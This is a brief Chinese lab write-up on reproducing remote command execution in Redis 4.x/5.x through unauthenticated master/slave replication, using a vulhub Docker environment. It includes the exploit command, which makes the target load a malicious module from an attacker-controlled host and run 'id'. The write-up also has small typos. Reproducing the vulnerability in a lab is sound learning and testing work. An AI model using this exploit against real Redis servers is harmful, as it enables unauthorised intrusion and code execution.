5.x 主从复制导致的命令执行
Redis 4.x/5.x 主从复制导致的命令执行
Redis是著名的开源Key-Value数据库,其具备再沙箱中执行Lua脚本的能力。
Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意目录。
环境搭建
cd vulhub/redis/4-unacc
docker0compose up -d
环境启动后,通过redis-cli -h 10.10.10.8即可进行连接,可见存在未授权访问漏洞。
漏洞复现
使用POC
python3 redis-master.py -r 10.10.10.8 -p 6379 -L 10.10.10.1 -P 8888 -f RedisModulesSDK/exp.so -c "id"